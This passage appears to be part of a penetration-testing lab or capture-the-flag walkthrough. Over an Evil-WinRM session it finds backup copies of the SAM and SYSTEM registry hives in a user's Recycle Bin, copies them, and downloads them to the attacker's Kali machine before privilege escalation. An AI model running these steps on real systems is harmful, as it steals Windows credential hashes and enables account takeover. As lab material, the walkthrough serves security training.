$Recycle.bin
Checking for the recycle bin of the current user upon gaining the initial foothold
*Evil-WinRM* PS C:\> [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
S-1-5-21-1987495829-1628902820-919763334-1001
*Evil-WinRM* PS C:\> cd 'C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001' ; ls
Directory: C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 7:28 PM 49152 sam.bak
-a---- 9/18/2020 7:28 PM 17457152 system.bakThose are backup copies of the system registry hive
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> mkdir C:\tmp
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> copy .\sam.bak C:\tmp\
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> copy .\system.bak C:\tmp\
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> cd C:\tmp
*Evil-WinRM* PS C:\tmp> download sam.bak .
Info: Downloading C:\tmp\sam.bak to sam.bak
Info: Download successful!
*Evil-WinRM* PS C:\tmp> download system.bak .
Info: Downloading C:\tmp\system.bak to system.bak
Info: Download successful!Transferred to Kali Moving on to Privilege Escalation phase